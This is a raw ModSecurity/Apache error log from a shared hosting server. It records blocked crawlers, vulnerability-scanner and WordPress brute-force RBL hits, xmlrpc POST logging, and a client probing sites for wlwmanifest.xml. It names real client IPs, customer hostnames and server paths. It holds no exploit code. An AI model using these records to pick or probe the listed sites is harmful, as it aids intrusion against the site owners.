[Tue May 26 16:22:38.539732 2026] [security2:error] [pid 795941:tid 796081] [client 68.234.41.184:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV7du2GQ_TLE_VHIp2M7wAAAI8"], referer: https://anujtradingco.com
[Tue May 26 16:22:38.591214 2026] [security2:error] [pid 795941:tid 796064] [remote 74.7.241.15:37324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lodgerajasabai212.svijaykumar.in"] [uri "/l212-officers-active.php"] [unique_id "ahV7du2GQ_TLE_VHIp2M8wAAmno"], referer: https://www.lodgerajasabai212.svijaykumar.in/
[Tue May 26 16:22:38.863388 2026] [security2:error] [pid 795941:tid 796121] [client 107.175.151.109:45101] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV7du2GQ_TLE_VHIp2M4AAAALc"], referer: https://www.cagmedya.com/
[Tue May 26 16:22:39.283902 2026] [security2:error] [pid 795941:tid 796198] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7du2GQ_TLE_VHIp2M_AAAAQQ"]
[Tue May 26 16:22:41.179754 2026] [security2:error] [pid 795941:tid 796164] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7eO2GQ_TLE_VHIp2NKwAAAOI"]
[Tue May 26 16:22:43.630458 2026] [security2:error] [pid 795941:tid 796155] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7eu2GQ_TLE_VHIp2NVwAAANk"]
[Tue May 26 16:22:45.134538 2026] [security2:error] [pid 795941:tid 796115] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7fO2GQ_TLE_VHIp2NegAAALE"]
[Tue May 26 16:22:46.207343 2026] [security2:error] [pid 795941:tid 796048] [remote 74.7.241.15:51170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lodgerajasabai212.svijaykumar.in"] [uri "/l212-officers-pastmasters.php"] [unique_id "ahV7fu2GQ_TLE_VHIp2NpQAAsGo"], referer: https://www.lodgerajasabai212.svijaykumar.in/
[Tue May 26 16:22:47.034121 2026] [security2:error] [pid 795941:tid 796182] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7fu2GQ_TLE_VHIp2NqAAAAPQ"]
[Tue May 26 16:22:48.227937 2026] [security2:error] [pid 795941:tid 796075] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV7f-2GQ_TLE_VHIp2NwQAAiTE"]
[Tue May 26 16:22:49.287780 2026] [security2:error] [pid 795941:tid 796073] [client 14.187.225.220:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7gO2GQ_TLE_VHIp2N1wAAAIc"]
[Tue May 26 16:22:49.934886 2026] [security2:error] [pid 795941:tid 796103] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7gO2GQ_TLE_VHIp2N5QAAAKU"]
[Tue May 26 16:22:51.602642 2026] [security2:error] [pid 795941:tid 796182] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7gu2GQ_TLE_VHIp2OPgAAAPQ"]
[Tue May 26 16:22:54.242085 2026] [security2:error] [pid 795941:tid 796131] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7he2GQ_TLE_VHIp2OfAAAAME"]
[Tue May 26 16:22:55.691884 2026] [security2:error] [pid 795941:tid 796085] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7hu2GQ_TLE_VHIp2OqAAAAJM"]
[Tue May 26 16:22:56.028148 2026] [security2:error] [pid 795941:tid 796130] [client 184.154.139.45:49808] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/themes/Divi/includes/builder/feature/dynamic-assets/assets/js/jquery.fitvids.js"] [unique_id "ahV7iO2GQ_TLE_VHIp2OvQAAAMA"]
[Tue May 26 16:22:56.470274 2026] [security2:error] [pid 795941:tid 796101] [client 184.154.139.45:49904] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV7iO2GQ_TLE_VHIp2OxgAAAKM"]
[Tue May 26 16:22:56.470302 2026] [security2:error] [pid 795941:tid 796101] [client 184.154.139.45:49904] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV7iO2GQ_TLE_VHIp2OxgAAAKM"]
[Tue May 26 16:22:58.063563 2026] [security2:error] [pid 795941:tid 796072] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7ie2GQ_TLE_VHIp2O1wAAAIY"]
[Tue May 26 16:22:59.982550 2026] [security2:error] [pid 795941:tid 796176] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7i-2GQ_TLE_VHIp2O9gAAAO4"]
[Tue May 26 16:23:00.440878 2026] [security2:error] [pid 795941:tid 796131] [client 184.154.139.45:51188] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV7jO2GQ_TLE_VHIp2PCQAAAME"]
[Tue May 26 16:23:00.440907 2026] [security2:error] [pid 795941:tid 796131] [client 184.154.139.45:51188] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV7jO2GQ_TLE_VHIp2PCQAAAME"]
[Tue May 26 16:23:01.229586 2026] [security2:error] [pid 795941:tid 796129] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7jO2GQ_TLE_VHIp2PDAAAAL8"]
[Tue May 26 16:23:03.030183 2026] [security2:error] [pid 795941:tid 796178] [client 51.68.107.156:18635] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.adityacreations.co.in"] [uri "/robots.txt"] [unique_id "ahV7j-2GQ_TLE_VHIp2PQQAAAPA"]
[Tue May 26 16:23:03.030289 2026] [security2:error] [pid 795941:tid 796178] [client 51.68.107.156:18635] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.adityacreations.co.in"] [uri "/robots.txt"] [unique_id "ahV7j-2GQ_TLE_VHIp2PQQAAAPA"]
[Tue May 26 16:23:04.208085 2026] [security2:error] [pid 795941:tid 796165] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7j-2GQ_TLE_VHIp2PSAAAAOM"]
[Tue May 26 16:23:05.384413 2026] [security2:error] [pid 795941:tid 796119] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7kO2GQ_TLE_VHIp2PZQAAALU"]
[Tue May 26 16:23:05.693798 2026] [security2:error] [pid 795941:tid 796077] [client 207.180.11.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahV7kO2GQ_TLE_VHIp2PWAAAAIs"], referer: https://www.bloggertarget.com/
[Tue May 26 16:23:06.563123 2026] [security2:error] [pid 795941:tid 796088] [client 184.154.139.45:53174] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/et-cache/260956/et-core-unified-deferred-260956.min.css"] [unique_id "ahV7ku2GQ_TLE_VHIp2PgwAAAJY"]
[Tue May 26 16:23:07.779848 2026] [security2:error] [pid 795941:tid 796124] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7k-2GQ_TLE_VHIp2PkwAAALo"]
[Tue May 26 16:23:08.667584 2026] [security2:error] [pid 795941:tid 796061] [remote 173.249.21.166:47560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.21.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahV7lO2GQ_TLE_VHIp2PtQAAyXc"]
[Tue May 26 16:23:08.735155 2026] [security2:error] [pid 795941:tid 795981] [remote 74.7.241.15:46894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lodgerajasabai212.svijaykumar.in"] [uri "/l212-website-disclaimer.php"] [unique_id "ahV7lO2GQ_TLE_VHIp2PwAAAoCc"], referer: https://www.lodgerajasabai212.svijaykumar.in/
[Tue May 26 16:23:08.981996 2026] [security2:error] [pid 795941:tid 796100] [client 184.154.139.45:53822] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/et-cache/260956/et-divi-dynamic-260956.css"] [unique_id "ahV7lO2GQ_TLE_VHIp2PxAAAAKI"]
[Tue May 26 16:23:09.255908 2026] [security2:error] [pid 795941:tid 796088] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7lO2GQ_TLE_VHIp2PuwAAAJY"]
[Tue May 26 16:23:09.460193 2026] [security2:error] [pid 795941:tid 796102] [client 184.154.139.45:53964] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/plugins/wpforms-lite/assets/lib/punycode.min.js"] [unique_id "ahV7le2GQ_TLE_VHIp2PzgAAAKQ"]
[Tue May 26 16:23:09.839790 2026] [security2:error] [pid 795941:tid 796119] [client 184.154.139.45:54088] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/plugins/wpforms-lite/assets/lib/jquery.inputmask.min.js"] [unique_id "ahV7le2GQ_TLE_VHIp2P1QAAAN4"]
[Tue May 26 16:23:11.591060 2026] [security2:error] [pid 795941:tid 796088] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7lu2GQ_TLE_VHIp2P-QAAAJY"]
[Tue May 26 16:23:11.845484 2026] [security2:error] [pid 795941:tid 796115] [client 184.154.139.45:54856] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV7l-2GQ_TLE_VHIp2QDAAAALE"], referer: http://www.google.com/url?url=ivwellnessresources.org&yahoo.com
[Tue May 26 16:23:12.245985 2026] [security2:error] [pid 795941:tid 796171] [client 184.154.139.45:54972] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahV7mO2GQ_TLE_VHIp2QGAAAAOk"]
[Tue May 26 16:23:13.504501 2026] [security2:error] [pid 795941:tid 796194] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7mO2GQ_TLE_VHIp2QKAAAAQA"]
[Tue May 26 16:23:15.560769 2026] [security2:error] [pid 795941:tid 796188] [client 74.7.175.142:46294] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "correo.cuatrodoce.com.mx"] [uri "/cgi-sys/404.html"] [unique_id "ahV7m-2GQ_TLE_VHIp2QYQAA-ko"]
[Tue May 26 16:23:15.822073 2026] [security2:error] [pid 795941:tid 796096] [client 184.154.139.45:56212] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/et-cache/261088/et-divi-dynamic-261088.css"] [unique_id "ahV7m-2GQ_TLE_VHIp2QZQAAAJ4"]
[Tue May 26 16:23:16.299024 2026] [security2:error] [pid 795941:tid 796113] [client 184.154.139.45:56378] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/et-cache/261027/et-core-unified-deferred-261027.min.css"] [unique_id "ahV7nO2GQ_TLE_VHIp2QbgAAAK8"]
[Tue May 26 16:23:16.981798 2026] [security2:error] [pid 795941:tid 796094] [client 82.42.110.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7m-2GQ_TLE_VHIp2QXQAAAJw"]
[Tue May 26 16:23:17.272019 2026] [security2:error] [pid 795941:tid 796129] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7mu2GQ_TLE_VHIp2QVwAAAL8"]
[Tue May 26 16:23:17.917545 2026] [security2:error] [pid 795941:tid 796112] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV7ne2GQ_TLE_VHIp2QhwAArlA"]
[Tue May 26 16:23:18.387874 2026] [security2:error] [pid 795941:tid 796188] [client 2.58.56.163:58380] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahV7nu2GQ_TLE_VHIp2QjQAAAPo"]
[Tue May 26 16:23:18.737281 2026] [security2:error] [pid 795941:tid 796160] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7ne2GQ_TLE_VHIp2QfgAAAN4"]
[Tue May 26 16:23:19.265583 2026] [security2:error] [pid 795941:tid 796194] [client 2.58.56.163:51129] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.56.58.2.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/xmlrpc.php"] [unique_id "ahV7n-2GQ_TLE_VHIp2QnQAAAQA"]
[Tue May 26 16:23:19.800240 2026] [security2:error] [pid 795941:tid 796152] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7n-2GQ_TLE_VHIp2QnwAAANY"]
[Tue May 26 16:23:20.474635 2026] [security2:error] [pid 795941:tid 796114] [client 2.58.56.163:56761] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahV7oO2GQ_TLE_VHIp2QuAAAALA"]
[Tue May 26 16:23:20.965525 2026] [security2:error] [pid 795941:tid 796147] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7oO2GQ_TLE_VHIp2QvgAAANE"]
[Tue May 26 16:23:21.029655 2026] [security2:error] [pid 795941:tid 796160] [client 184.154.139.45:57800] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/plugins/ddpro/js/clipboard.min.js"] [unique_id "ahV7oe2GQ_TLE_VHIp2QyAAAAN4"]
[Tue May 26 16:23:21.124187 2026] [security2:error] [pid 795941:tid 796134] [client 2.58.56.163:60958] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahV7oe2GQ_TLE_VHIp2QzQAAAMQ"]
[Tue May 26 16:23:21.779831 2026] [security2:error] [pid 795941:tid 796151] [client 2.58.56.163:51722] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahV7oe2GQ_TLE_VHIp2Q4QAAANU"]
[Tue May 26 16:23:21.924617 2026] [autoindex:error] [pid 795941:tid 796184] [client 174.138.48.132:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:23:22.431487 2026] [security2:error] [pid 795941:tid 796143] [client 2.58.56.163:53073] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahV7ou2GQ_TLE_VHIp2Q9gAAAM0"]
[Tue May 26 16:23:22.856687 2026] [security2:error] [pid 795941:tid 796072] [client 185.93.89.10:38322] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahV7ou2GQ_TLE_VHIp2Q-gAAAIY"]
[Tue May 26 16:23:23.128198 2026] [security2:error] [pid 795941:tid 796106] [client 2.58.56.163:58170] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahV7o-2GQ_TLE_VHIp2RBgAAAKg"]
[Tue May 26 16:23:23.319139 2026] [security2:error] [pid 782634:tid 782857] [client 114.119.135.233:63049] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ucdc.co.in"] [uri "/upload/omr/520190478.pdf"] [unique_id "ahV7o__P9qBfeb1w76ZpqAAAAF0"], referer: https://www.ucdc.co.in/upload/omr
[Tue May 26 16:23:23.808608 2026] [security2:error] [pid 795941:tid 796198] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV7ou2GQ_TLE_VHIp2Q-QAAAQQ"]
[Tue May 26 16:23:23.921103 2026] [security2:error] [pid 795941:tid 796121] [client 2.58.56.163:61589] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahV7o-2GQ_TLE_VHIp2RGwAAALc"]
[Tue May 26 16:23:24.135192 2026] [security2:error] [pid 795941:tid 796155] [client 216.73.217.138:26457] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahV7o-2GQ_TLE_VHIp2RDQAA2Vs"]
[Tue May 26 16:23:24.290390 2026] [security2:error] [pid 795941:tid 796196] [client 184.154.139.45:58916] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/et-cache/261016/et-core-unified-deferred-261016.min.css"] [unique_id "ahV7pO2GQ_TLE_VHIp2RIQAAAQI"]
